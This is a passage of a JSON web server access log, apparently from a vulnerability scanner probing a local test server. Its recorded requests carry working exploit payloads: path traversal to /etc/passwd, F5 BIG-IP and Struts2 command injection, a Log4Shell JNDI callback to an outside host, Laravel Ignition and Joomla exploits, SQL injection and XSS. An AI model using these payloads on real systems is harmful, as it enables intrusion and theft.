HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plc/webvisu.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web-console/ServerInfo.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"{\x22email\x22:\x22297MFfbj8eIpHfj13gUs2QV0Zfb@example.com\x22,\x22password\x22:\x22297MFfbj8eIpHfj13gUs2QV0Zfb\x22,\x22username\x22:\x22297MFfbj8eIpHfj13gUs2QV0Zfb\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/admin/Index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cp/Shares?user=&protocol=webaccess&v=2.3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFhw9yEZBKwmuE5lM38PWgOp.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/userinfo.php?UID=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.c9v8gc8smpv8b0ng0t00fif8s8su78pqp.oast.online/test}&url=https://localhost HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 